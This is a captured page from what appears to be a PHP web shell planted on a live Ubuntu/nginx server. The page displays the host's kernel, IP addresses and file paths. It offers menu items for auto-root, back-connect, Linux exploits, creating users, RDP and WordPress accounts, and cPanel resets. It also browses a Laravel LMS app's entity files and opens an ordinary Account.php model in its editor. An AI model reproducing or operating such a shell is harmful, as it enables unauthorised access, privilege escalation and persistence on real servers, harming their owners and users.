Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-api-8 /
app /
Modules /
User /
Entities /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitkeep
0
B
-rw-r--r--
Account.php
1.61
KB
-rw-r--r--
AccountContent.php
384
B
-rw-r--r--
AccountModule.php
385
B
-rw-r--r--
AccountRequest.php
668
B
-rw-r--r--
AccountSocialMedia.php
447
B
-rw-r--r--
AccountUser.php
922
B
-rw-r--r--
MasterContent.php
276
B
-rw-r--r--
MasterSocialMedia.php
248
B
-rw-r--r--
ModelHasRole.php
165
B
-rw-r--r--
Role.php
147
B
-rw-r--r--
Setting.php
294
B
-rw-r--r--
SystemModule.php
252
B
-rw-r--r--
User.php
1.6
KB
-rw-r--r--
UserActivations.php
248
B
-rw-r--r--
UserProfile.php
772
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Account.php
<?php namespace App\Modules\User\Entities; use App\Traits\CommonTrait; use Illuminate\Database\Eloquent\Model; class Account extends Model { use CommonTrait; public $timestamps = false; protected $table = 'accounts'; protected $guarded = ['id']; public $appends = ['logo_path', 'banner_path', 'address', 'contact_number']; public function note_by() { return $this->hasOne(User::class, 'id', 'note_by_id'); } public function account_content() { return $this->hasMany(AccountContent::class, 'account_id'); } public function account_modules() { return $this->hasMany(AccountModule::class, 'account_id'); } public function getLogoPathAttribute() { if (!empty($this->company_logo)) { return asset($this->company_logo); } else { return asset('front/img/no-img.jpg'); } } public function getBannerPathAttribute() { if (!empty($this->company_banner)) { return asset($this->company_banner); } else { return asset('front/img/no-img.jpg'); } } public function getAddressAttribute() { return $this->formatAddress($this); } public function getContactNumberAttribute() { if ($this->company_contact1) { return $this->company_contact1; } elseif ($this->company_contact2) { return $this->company_contact2; } elseif ($this->person_phone1) { return $this->person_phone1; } elseif ($this->person_phone2) { return $this->person_phone2; } } }
Close